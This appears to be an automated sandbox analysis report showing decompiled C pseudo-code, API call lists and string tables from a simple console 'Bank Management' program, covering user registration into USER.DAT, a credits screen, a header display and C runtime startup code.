                                                • Opcode Fuzzy Hash: 8f68f0044d92cee46a3857197f934cba047f56bb2c8d8ece20c0c8ecc6e3979f
                                                • Instruction Fuzzy Hash: C071CBF2D30306EBDB15EBE4ED82EBE72786BE5700F04411DE905A5184FA71E25887B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E012325C0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v8;
                                                				char _v12;
                                                				char _v15;
                                                				char _v19;
                                                				char _v23;
                                                				char _v27;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v44;
                                                				char _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v67;
                                                				char _v71;
                                                				char _v75;
                                                				char _v76;
                                                				char _v108;
                                                				char _v140;
                                                				void* __ebp;
                                                				intOrPtr _t42;
                                                				void* _t44;
                                                				intOrPtr _t53;
                                                				intOrPtr _t58;
                                                				intOrPtr _t67;
                                                				void* _t70;
                                                				void* _t73;
                                                				intOrPtr _t75;
                                                				intOrPtr _t76;
                                                				intOrPtr _t79;
                                                				void* _t83;
                                                				void* _t84;
                                                				void* _t85;
                                                				void* _t88;
                                                				void* _t89;
                                                				void* _t90;
                                                				void* _t103;
                                                
                                                				_t103 = __fp0;
                                                				_t84 = __esi;
                                                				_t83 = __edi;
                                                				_t73 = __ebx;
                                                				_v8 = 0;
                                                				_v12 = 0;
                                                				_v76 = 0;
                                                				_v75 = 0;
                                                				_v71 = 0;
                                                				_v67 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v44 = 0;
                                                				_t74 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v27 = 0;
                                                				_v23 = 0;
                                                				_v19 = 0;
                                                				_v15 = 0;
                                                				do {
                                                					E012320E0(_t74, _t83, _t84, 0, _t103);
                                                					_v8 = 0;
                                                					E012312B0(0x19, 8);
                                                					_push("User Name        : ");
                                                					E0123715C(_t73, _t83, _t84, 0);
                                                					E0123738B("%s", 0x1252ee4);
                                                					_t42 = E01236EF1("USER.DAT", "r");
                                                					_t88 = _t85 + 0x14;
                                                					 *0x1252f28 = _t42;
                                                					_v12 = 0;
                                                					while(1) {
                                                						_push( &_v140);
                                                						_push( &_v108);
                                                						_t75 =  *0x1252f28; // 0x0
                                                						_t44 = E01237021(_t75, "%s %s %s\n", 0x1252ee0);
                                                						_t89 = _t88 + 0x14;
                                                						if(_t44 == 0xffffffff) {
                                                							goto L6;
                                                						}
                                                						_t70 = E01238230( &_v108, 0x1252ee4);
                                                						_t88 = _t89 + 8;
                                                						if(_t70 == 0) {
                                                							_v12 = _v12 + 1;
                                                						}
                                                					}
                                                					L6:
                                                					_t74 =  *0x1252f28; // 0x0
                                                					_push(_t74);
                                                					E01236DB6(_t73, _t83, _t84, __eflags);
                                                					_t90 = _t89 + 4;
                                                					__eflags = _v12;
                                                					if(__eflags == 0) {
                                                						E012312B0(0x19, 0xa);
                                                						_push("Password         : ");
                                                						E0123715C(_t73, _t83, _t84, __eflags);
                                                						E012312F0(_t83, _t84,  &_v76);
                                                						E012312B0(0x19, 0xc);
                                                						_push("Confirm Password : ");
                                                						E0123715C(_t73, _t83, _t84, __eflags);
                                                						_t74 =  &_v44;
                                                						E012312F0(_t83, _t84,  &_v44);
                                                						_t53 = E01238230(0x1252f02,  &_v44);
                                                						_t85 = _t90 + 0x10;
                                                						__eflags = _t53;
                                                						if(__eflags != 0) {
                                                							E012320E0( &_v44, _t83, _t84, __eflags, _t103);
                                                							E012312B0(0xa, 0xa);
                                                							_push(0x124f444);
                                                							E0123715C(_t73, _t83, _t84, __eflags);
                                                							_t85 = _t85 + 4;
                                                							_t67 = _v8 + 1;
                                                							__eflags = _t67;
                                                							_v8 = _t67;
                                                						}
                                                					} else {
                                                						E012312B0(0xa, 0xa);
                                                						_push(0x124f3e0);
                                                						E0123715C(_t73, _t83, _t84, __eflags);
                                                						_t85 = _t90 + 4;
                                                						_v8 = _v8 + 1;
                                                					}
                                                					__eflags = _v8;
                                                				} while (__eflags != 0);
                                                				 *0x1252f28 = E01236EF1("USER.DAT", 0x124f474);
                                                				_t76 =  *0x1252f28; // 0x0
                                                				_push(_t76);
                                                				E01236DB6(_t73, _t83, _t84, __eflags);
                                                				 *0x1252f28 = E01236EF1("USER.DAT", "a");
                                                				_push(0x1252f02);
                                                				_push(0x1252ee4);
                                                				_push(0x1252ee0);
                                                				_push("%s %s %s\n");
                                                				_t79 =  *0x1252f28; // 0x0
                                                				_push(_t79);
                                                				E01236F06(_t73, _t83, _t84, __eflags);
                                                				_t58 =  *0x1252f28; // 0x0
                                                				_push(_t58);
                                                				E01236DB6(_t73, _t83, _t84, __eflags);
                                                				E012320E0(_t76, _t83, _t84, __eflags, _t103);
                                                				E012312B0(0x19, 0xa);
                                                				_push("Record ADDED successfully!");
                                                				return E0123715C(_t73, _t83, _t84, __eflags);
                                                			}











































                                                0x012325c0
                                                0x012325c0
                                                0x012325c0
                                                0x012325c0
                                                0x012325c9
                                                0x012325d0
                                                0x012325d7
                                                0x012325dd
                                                0x012325e0
                                                0x012325e3
                                                0x012325e6
                                                0x012325e9
                                                0x012325ec
                                                0x012325ef
                                                0x012325f2
                                                0x012325f5
                                                0x012325f9
                                                0x012325fb
                                                0x012325fe
                                                0x01232601
                                                0x01232604
                                                0x01232607
                                                0x0123260a
                                                0x0123260d
                                                0x01232610
                                                0x01232613
                                                0x01232613
                                                0x01232618
                                                0x01232623
                                                0x01232628
                                                0x0123262d
                                                0x0123263f
                                                0x01232651
                                                0x01232656
                                                0x01232659
                                                0x0123265e
                                                0x01232665
                                                0x0123266b
                                                0x0123266f
                                                0x0123267a
                                                0x01232681
                                                0x01232686
                                                0x0123268c
                                                0x00000000
                                                0x00000000
                                                0x01232697
                                                0x0123269c
                                                0x012326a1
                                                0x012326a9
                                                0x012326a9
                                                0x012326ac
                                                0x012326ae
                                                0x012326ae
                                                0x012326b4
                                                0x012326b5
                                                0x012326ba
                                                0x012326bd
                                                0x012326c1
                                                0x012326e8
                                                0x012326ed
                                                0x012326f2
                                                0x012326fe
                                                0x01232707
                                                0x0123270c
                                                0x01232711
                                                0x01232719
                                                0x0123271d
                                                0x0123272b
                                                0x01232730
                                                0x01232733
                                                0x01232735
                                                0x01232737
                                                0x01232740
                                                0x01232745
                                                0x0123274a
                                                0x0123274f
                                                0x01232755
                                                0x01232755
                                                0x01232758
                                                0x01232758
                                                0x012326c3
                                                0x012326c7
                                                0x012326cc
                                                0x012326d1
                                                0x012326d6
                                                0x012326df
                                                0x012326df
                                                0x0123275b
                                                0x0123275b
                                                0x01232777
                                                0x0123277c
                                                0x01232782
                                                0x01232783
                                                0x0123279d
                                                0x012327a2
                                                0x012327a7
                                                0x012327ac
                                                0x012327b1
                                                0x012327b6
                                                0x012327bc
                                                0x012327bd
                                                0x012327c5
                                                0x012327ca
                                                0x012327cb
                                                0x012327d3
                                                0x012327dc
                                                0x012327e1
                                                0x012327f1

                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 0123262D
                                                • _wscanf.LIBCMT ref: 0123263F
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 01232681
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _wprintf.LIBCMT ref: 012326D1
                                                • _wprintf.LIBCMT ref: 012326F2
                                                • _wprintf.LIBCMT ref: 01232711
                                                • _wprintf.LIBCMT ref: 0123274A
                                                • _fprintf.LIBCMT ref: 012327BD
                                                • _wprintf.LIBCMT ref: 012327E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__fsopen_fprintf_swscanf_vfscanf_vwscanf_wscanf
                                                • String ID: %s %s %s$%s %s %s$Confirm Password : $Password : $Record ADDED successfully!$USER.DAT$USER.DAT$USER.DAT$User Name :
                                                • API String ID: 3917209068-3252730458
                                                • Opcode ID: 610a211e7216a3f412340d693cf4ca47ff4aa6f30c8cf96b8b88b39b9e9796fc
                                                • Instruction ID: bdb29ec0656845abf92865ede578f01533887ee038f045a38b4cf734633c5e7a
                                                • Opcode Fuzzy Hash: 610a211e7216a3f412340d693cf4ca47ff4aa6f30c8cf96b8b88b39b9e9796fc
                                                • Instruction Fuzzy Hash: 5E51ABF1D70305FFDB14EFA8ED42BED7AB46FA5704F04402DE504B6280EAB092589766
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E012321E0(void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                				intOrPtr _v8;
                                                				void* __ebp;
                                                				void* _t28;
                                                				intOrPtr _t31;
                                                				void* _t34;
                                                				void* _t35;
                                                				void* _t36;
                                                
                                                				_t33 = __esi;
                                                				_t32 = __edi;
                                                				E01231380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
                                                				E012312B0(0x1b, 4);
                                                				_push("BANK MANAGEMENT //");
                                                				E0123715C(_t28, __edi, __esi, __eflags);
                                                				_t35 = _t34 + 4;
                                                				E012312B0(0x19, 5);
                                                				_v8 = 0;
                                                				while(1) {
                                                					_t42 = _v8 - 0x1b;
                                                					if(_v8 >= 0x1b) {
                                                						break;
                                                					}
                                                					_push(0xc4);
                                                					_push("%c");
                                                					E0123715C(_t28, _t32, _t33, _t42);
                                                					_t35 = _t35 + 8;
                                                					_v8 = _v8 + 1;
                                                				}
                                                				E012312B0(0x19, 8);
                                                				_push("Designed and Programmed by:");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				_t36 = _t35 + 4;
                                                				E012312B0(0x19, 9);
                                                				_v8 = 0;
                                                				while(1) {
                                                					__eflags = _v8 - 0x1b;
                                                					if(__eflags >= 0) {
                                                						break;
                                                					}
                                                					_push(0xc4);
                                                					_push("%c");
                                                					E0123715C(_t28, _t32, _t33, __eflags);
                                                					_t36 = _t36 + 8;
                                                					_t31 = _v8 + 1;
                                                					__eflags = _t31;
                                                					_v8 = _t31;
                                                				}
                                                				E012312B0(0x21, 0xb);
                                                				_push("Ravi Agrawal");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				E012312B0(0x21, 0xd);
                                                				_push("Sagar Sharma");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				E012312B0(0x21, 0xf);
                                                				_push("Sawal Maskey");
                                                				E0123715C(_t28, _t32, _t33, __eflags);
                                                				E012312B0(0x18, 0x14);
                                                				_push("Press Any key to continue...");
                                                				return E0123715C(_t28, _t32, _t33, __eflags);
                                                			}










                                                0x012321e0
                                                0x012321e0
                                                0x012321ec
                                                0x012321f5
                                                0x012321fa
                                                0x012321ff
                                                0x01232204
                                                0x0123220b
                                                0x01232210
                                                0x01232222
                                                0x01232222
                                                0x01232226
                                                0x00000000
                                                0x00000000
                                                0x01232228
                                                0x0123222d
                                                0x01232232
                                                0x01232237
                                                0x0123221f
                                                0x0123221f
                                                0x01232240
                                                0x01232245
                                                0x0123224a
                                                0x0123224f
                                                0x01232256
                                                0x0123225b
                                                0x0123226d
                                                0x0123226d
                                                0x01232271
                                                0x00000000
                                                0x00000000
                                                0x01232273
                                                0x01232278
                                                0x0123227d
                                                0x01232282
                                                0x01232267
                                                0x01232267
                                                0x0123226a
                                                0x0123226a
                                                0x0123228b
                                                0x01232290
                                                0x01232295
                                                0x012322a1
                                                0x012322a6
                                                0x012322ab
                                                0x012322b7
                                                0x012322bc
                                                0x012322c1
                                                0x012322cd
                                                0x012322d2
                                                0x012322e2

                                                APIs
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 012321FF
                                                • _wprintf.LIBCMT ref: 01232232
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 0123224A
                                                • _wprintf.LIBCMT ref: 0123227D
                                                • _wprintf.LIBCMT ref: 01232295
                                                • _wprintf.LIBCMT ref: 012322AB
                                                • _wprintf.LIBCMT ref: 012322C1
                                                • _wprintf.LIBCMT ref: 012322D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                • String ID: BANK MANAGEMENT //$Designed and Programmed by:$Press Any key to continue...$Ravi Agrawal$Sagar Sharma$Sawal Maskey
                                                • API String ID: 1778593935-2888666035
                                                • Opcode ID: bb80b41af1ac69cd044a5e3b3c2153553a73aab9ca4655b38ba03c0bbdfde7d0
                                                • Instruction ID: 31672184893a7d4b51700bf9b68a38bed7aafc7c2a576a83b6f59c93706bf5af
                                                • Opcode Fuzzy Hash: bb80b41af1ac69cd044a5e3b3c2153553a73aab9ca4655b38ba03c0bbdfde7d0
                                                • Instruction Fuzzy Hash: 2A217FF1BB4316B6FB157BE85D03FBD31605BE1B54F014124BA41392C1E9F1261852A7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 66%
                                                			E012320E0(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				intOrPtr _v8;
                                                				void* __ebp;
                                                				void* _t9;
                                                				intOrPtr _t16;
                                                				void* _t20;
                                                				void* _t24;
                                                				void* _t26;
                                                				void* _t27;
                                                				void* _t31;
                                                				void* _t37;
                                                
                                                				_t37 = __fp0;
                                                				_t23 = __esi;
                                                				_t22 = __edi;
                                                				E01231380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
                                                				E012312B0(0x19, 1);
                                                				_push("Banking Management //");
                                                				E0123715C(_t20, __edi, __esi, __eflags);
                                                				E012312B0(5, 3);
                                                				_t9 = E01238230(0x1252ee4, "Admin");
                                                				_t26 = _t24 + 0xc;
                                                				if(_t9 == 0) {
                                                					 *0x1252240 = 1;
                                                				}
                                                				_t34 =  *0x1252240;
                                                				if( *0x1252240 == 0) {
                                                					_push(0x1252ee4);
                                                					_push("Current User : %s");
                                                					E0123715C(_t20, _t22, _t23, __eflags);
                                                					_t27 = _t26 + 8;
                                                				} else {
                                                					_push("Current User : Admin");
                                                					E0123715C(_t20, _t22, _t23, _t34);
                                                					_t27 = _t26 + 4;
                                                				}
                                                				_push("\t\t\t\tDate : ");
                                                				E0123715C(_t20, _t22, _t23, _t34);
                                                				E0123834B(_t34, 0x1252f40);
                                                				_push(0x1252f40);
                                                				E012316A0(_t22, _t23, _t37);
                                                				_push(0x1252f40);
                                                				_push("%s");
                                                				E0123715C(_t20, _t22, _t23, _t34);
                                                				E0123834B(_t34, 0x1252f40);
                                                				_t31 = _t27 + 0x14;
                                                				_t16 = E012312B0(1, 5);
                                                				_v8 = 0;
                                                				while(1) {
                                                					_t35 = _v8 - 0x4e;
                                                					if(_v8 >= 0x4e) {
                                                						break;
                                                					}
                                                					_push(0xc4);
                                                					_push("%c");
                                                					E0123715C(_t20, _t22, _t23, _t35);
                                                					_t31 = _t31 + 8;
                                                					_t16 = _v8 + 1;
                                                					_v8 = _t16;
                                                				}
                                                				return _t16;
                                                			}













                                                0x012320e0
                                                0x012320e0
                                                0x012320e0
                                                0x012320ec
                                                0x012320f5
                                                0x012320fa
                                                0x012320ff
                                                0x0123210b
                                                0x0123211a
                                                0x0123211f
                                                0x01232124
                                                0x01232126
                                                0x01232126
                                                0x01232130
                                                0x01232137
                                                0x01232148
                                                0x0123214d
                                                0x01232152
                                                0x01232157
                                                0x01232139
                                                0x01232139
                                                0x0123213e
                                                0x01232143
                                                0x01232143
                                                0x0123215a
                                                0x0123215f
                                                0x0123216c
                                                0x01232174
                                                0x01232179
                                                0x0123217e
                                                0x01232183
                                                0x01232188
                                                0x01232195
                                                0x0123219a
                                                0x012321a1
                                                0x012321a6
                                                0x012321b8
                                                0x012321b8
                                                0x012321bc
                                                0x00000000
                                                0x00000000
                                                0x012321be
                                                0x012321c3
                                                0x012321c8
                                                0x012321cd
                                                0x012321b2
                                                0x012321b5
                                                0x012321b5
                                                0x012321d5

                                                APIs
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 012320FF
                                                • _wprintf.LIBCMT ref: 0123213E
                                                • _wprintf.LIBCMT ref: 01232152
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 0123215F
                                                • __wstrtime.LIBCMT ref: 0123216C
                                                • _wprintf.LIBCMT ref: 01232188
                                                • __wstrtime.LIBCMT ref: 01232195
                                                • _wprintf.LIBCMT ref: 012321C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                • String ID: Date : $Admin$Banking Management //$Current User : %s$Current User : Admin$N
                                                • API String ID: 3817360410-644830535
                                                • Opcode ID: 684903d57c73315166edaf968c06c9a40e277e63f0ba1112a7cc0e2fed92f2c4
                                                • Instruction ID: aa7eb6eefecd4d31fd9186674e220e13b62dc7552f68dff6d8c843a5bed3c135
                                                • Opcode Fuzzy Hash: 684903d57c73315166edaf968c06c9a40e277e63f0ba1112a7cc0e2fed92f2c4
                                                • Instruction Fuzzy Hash: ED119EF1BF4303F6E7947BA26D43F6931505BA0B15F040168FF84392C1E5F1661801AB
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E0123A5E2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                				signed int _t81;
                                                				void* _t86;
                                                				long _t90;
                                                				signed int _t94;
                                                				signed int _t98;
                                                				signed int _t99;
                                                				signed char _t103;
                                                				signed int _t105;
                                                				intOrPtr _t106;
                                                				intOrPtr* _t109;
                                                				signed char _t111;
                                                				long _t119;
                                                				signed int _t130;
                                                				signed int _t134;
                                                				signed int _t135;
                                                				signed int _t138;
                                                				void** _t139;
                                                				signed int _t141;
                                                				void* _t142;
                                                				signed int _t143;
                                                				void** _t147;
                                                				signed int _t149;
                                                				void* _t150;
                                                				signed int _t154;
                                                				void* _t155;
                                                				void* _t160;
                                                
                                                				_push(0x64);
                                                				_push(0x124d8c0);
                                                				E01239160(__ebx, __edi, __esi);
                                                				E0123BE5F(0xb);
                                                				_t130 = 0;
                                                				 *(_t155 - 4) = 0;
                                                				_t160 =  *0x1252f60 - _t130; // 0x0
                                                				if(_t160 == 0) {
                                                					_push(0x40);
                                                					_t141 = 0x20;
                                                					_push(_t141);
                                                					_t81 = E0123C55B();
                                                					_t134 = _t81;
                                                					 *(_t155 - 0x24) = _t134;
                                                					__eflags = _t134;
                                                					if(_t134 != 0) {
                                                						 *0x1252f60 = _t81;
                                                						 *0x1252f5c = _t141;
                                                						while(1) {
                                                							__eflags = _t134 - _t81 + 0x800;
                                                							if(_t134 >= _t81 + 0x800) {
                                                								break;
                                                							}
                                                							 *((short*)(_t134 + 4)) = 0xa00;
                                                							 *_t134 =  *_t134 | 0xffffffff;
                                                							 *(_t134 + 8) = _t130;
                                                							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
                                                							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x0000007f;
                                                							 *((short*)(_t134 + 0x25)) = 0xa0a;
                                                							 *(_t134 + 0x38) = _t130;
                                                							 *(_t134 + 0x34) = _t130;
                                                							_t134 = _t134 + 0x40;
                                                							 *(_t155 - 0x24) = _t134;
                                                							_t81 =  *0x1252f60; // 0x0
                                                						}
                                                						GetStartupInfoW(_t155 - 0x74);
                                                						__eflags =  *((short*)(_t155 - 0x42));
                                                						if( *((short*)(_t155 - 0x42)) == 0) {
                                                							while(1) {
                                                								L31:
                                                								 *(_t155 - 0x2c) = _t130;
                                                								__eflags = _t130 - 3;
                                                								if(_t130 >= 3) {
                                                									break;
                                                								}
                                                								_t147 = (_t130 << 6) +  *0x1252f60;
                                                								 *(_t155 - 0x24) = _t147;
                                                								__eflags =  *_t147 - 0xffffffff;
                                                								if( *_t147 == 0xffffffff) {
                                                									L35:
                                                									_t147[1] = 0x81;
                                                									__eflags = _t130;
                                                									if(_t130 != 0) {
                                                										_t66 = _t130 - 1; // -1
                                                										asm("sbb eax, eax");
                                                										_t90 =  ~_t66 + 0xfffffff5;
                                                										__eflags = _t90;
                                                									} else {
                                                										_t90 = 0xfffffff6;
                                                									}
                                                									_t142 = GetStdHandle(_t90);
                                                									__eflags = _t142 - 0xffffffff;
                                                									if(_t142 == 0xffffffff) {
                                                										L47:
                                                										_t147[1] = _t147[1] | 0x00000040;
                                                										 *_t147 = 0xfffffffe;
                                                										_t94 =  *0x1253064;
                                                										__eflags = _t94;
                                                										if(_t94 != 0) {
                                                											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
                                                										}
                                                										goto L49;
                                                									} else {
                                                										__eflags = _t142;
                                                										if(_t142 == 0) {
                                                											goto L47;
                                                										}
                                                										_t98 = GetFileType(_t142);
                                                										__eflags = _t98;
                                                										if(_t98 == 0) {
                                                											goto L47;
                                                										}
                                                										 *_t147 = _t142;
                                                										_t99 = _t98 & 0x000000ff;
                                                										__eflags = _t99 - 2;
                                                										if(_t99 != 2) {
                                                											__eflags = _t99 - 3;
                                                											if(_t99 != 3) {
                                                												L46:
                                                												_t70 =  &(_t147[3]); // -19214164
                                                												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
                                                												_t147[2] = _t147[2] + 1;
                                                												L49:
                                                												_t130 = _t130 + 1;
                                                												continue;
                                                											}
                                                											_t103 = _t147[1] | 0x00000008;
                                                											__eflags = _t103;
                                                											L45:
                                                											_t147[1] = _t103;
                                                											goto L46;
                                                										}
                                                										_t103 = _t147[1] | 0x00000040;
                                                										goto L45;
                                                									}
                                                								}
                                                								__eflags =  *_t147 - 0xfffffffe;
                                                								if( *_t147 == 0xfffffffe) {
                                                									goto L35;
                                                								}
                                                								_t147[1] = _t147[1] | 0x00000080;
                                                								goto L49;
                                                							}
                                                							 *(_t155 - 4) = 0xfffffffe;
                                                							E0123A8A6();
                                                							L2:
                                                							_t86 = 1;
                                                							L3:
                                                							return E012391A5(_t86);
                                                						}
                                                						_t105 =  *(_t155 - 0x40);
                                                						__eflags = _t105;
                                                						if(_t105 == 0) {
                                                							goto L31;
                                                						}
                                                						_t135 =  *_t105;
                                                						 *(_t155 - 0x1c) = _t135;
                                                						_t106 = _t105 + 4;
                                                						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                                						 *(_t155 - 0x20) = _t106 + _t135;
                                                						__eflags = _t135 - 0x800;
                                                						if(_t135 >= 0x800) {
                                                							_t135 = 0x800;
                                                							 *(_t155 - 0x1c) = 0x800;
                                                						}
                                                						_t149 = 1;
                                                						__eflags = 1;
                                                						 *(_t155 - 0x30) = 1;
                                                						while(1) {
                                                							__eflags =  *0x1252f5c - _t135; // 0x3
                                                							if(__eflags >= 0) {
                                                								break;
                                                							}
                                                							_t138 = E0123C55B(_t141, 0x40);
                                                							 *(_t155 - 0x24) = _t138;
                                                							__eflags = _t138;
                                                							if(_t138 != 0) {
                                                								0x1252f60[_t149] = _t138;
                                                								 *0x1252f5c =  *0x1252f5c + _t141;
                                                								__eflags =  *0x1252f5c;
                                                								while(1) {
                                                									__eflags = _t138 - 0x1252f60[_t149] + 0x800;
                                                									if(_t138 >= 0x1252f60[_t149] + 0x800) {
                                                										break;
                                                									}
                                                									 *((short*)(_t138 + 4)) = 0xa00;
                                                									 *_t138 =  *_t138 | 0xffffffff;
                                                									 *(_t138 + 8) = _t130;
                                                									 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
                                                									 *((short*)(_t138 + 0x25)) = 0xa0a;
                                                									 *(_t138 + 0x38) = _t130;
                                                									 *(_t138 + 0x34) = _t130;
                                                									_t138 = _t138 + 0x40;
                                                									 *(_t155 - 0x24) = _t138;
                                                								}
                                                								_t149 = _t149 + 1;
                                                								 *(_t155 - 0x30) = _t149;
                                                								_t135 =  *(_t155 - 0x1c);
                                                								continue;
                                                							}
                                                							_t135 =  *0x1252f5c; // 0x3
                                                							 *(_t155 - 0x1c) = _t135;
                                                							break;
                                                						}
                                                						_t143 = _t130;
                                                						 *(_t155 - 0x2c) = _t143;
                                                						_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                                						_t139 =  *(_t155 - 0x20);
                                                						while(1) {
                                                							__eflags = _t143 - _t135;
                                                							if(_t143 >= _t135) {
                                                								goto L31;
                                                							}
                                                							_t150 =  *_t139;
                                                							__eflags = _t150 - 0xffffffff;
                                                							if(_t150 == 0xffffffff) {
                                                								L26:
                                                								_t143 = _t143 + 1;
                                                								 *(_t155 - 0x2c) = _t143;
                                                								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                                								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                                								_t139 =  &(_t139[1]);
                                                								 *(_t155 - 0x20) = _t139;
                                                								continue;
                                                							}
                                                							__eflags = _t150 - 0xfffffffe;
                                                							if(_t150 == 0xfffffffe) {
                                                								goto L26;
                                                							}
                                                							_t111 =  *_t109;
                                                							__eflags = _t111 & 0x00000001;
                                                							if((_t111 & 0x00000001) == 0) {
                                                								goto L26;
                                                							}
                                                							__eflags = _t111 & 0x00000008;
                                                							if((_t111 & 0x00000008) != 0) {
                                                								L24:
                                                								_t154 = ((_t143 & 0x0000001f) << 6) + 0x1252f60[_t143 >> 5];
                                                								 *(_t155 - 0x24) = _t154;
                                                								 *_t154 =  *_t139;
